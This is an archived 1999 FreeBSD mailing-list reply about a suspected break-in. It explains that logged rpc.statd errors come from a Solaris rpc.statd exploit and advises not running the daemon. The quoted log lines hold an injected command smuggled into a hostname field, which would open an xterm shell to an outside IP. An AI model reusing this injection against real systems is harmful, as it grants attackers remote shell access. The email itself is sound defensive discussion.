From owner-freebsd-hackers Sat Feb 20 22:15:59 1999 Delivered-To: freebsd-hackers@freebsd.org Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (Postfix) with ESMTP id B763310E3B; Sat, 20 Feb 1999 22:15:53 -0800 (PST) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.3/8.9.2/best.sh) id WAA16375; Sat, 20 Feb 1999 22:14:54 -0800 (PST) Message-ID: <19990220221453.B15747@best.com> Date: Sat, 20 Feb 1999 22:14:53 -0800 From: "Jan B. Koum " To: Greg Lehey , FreeBSD Hackers , FreeBSD-isp@FreeBSD.ORG Subject: Re: New breakin technique? References: <19990221141243.G93492@lemis.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <19990221141243.G93492@lemis.com>; from Greg Lehey on Sun, Feb 21, 1999 at 02:12:43PM +1030 Sender: owner-freebsd-hackers@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Sun, Feb 21, 1999 at 02:12:43PM +1030, Greg Lehey wrote: > I've just found the following messages in my logs: > > Feb 21 10:13:11 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0 > Feb 21 10:13:14 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.132:0 > Feb 21 13:41:55 freebie rpc.statd: Invalid hostname to sm_mon: ;/usr/openwin/bin/xterm -display 207.193.26.82:0; > > Has anybody seen something like this? It looks as if somebody is > trying to break in, but I didn't know that rpc.statd could start > xterms. > > Under these circumstances, it would be interesting to know if > rpc.statd *must* run as root. Wouldn't, say, bin be enough? > > Greg > -- > See complete headers for address, home page and phone numbers > finger grog@lemis.com for PGP public key > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-isp" in the body of the message This should go to -security@ but anyway - they think that freebie is a solaris box. There is remote exploit for rpc.statd for solaris. See: http://www.geek-girl.com/bugtraq/1997_4/0378.html But please don't run rpc.statd if you don't need it in any case? Thanks, :) -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message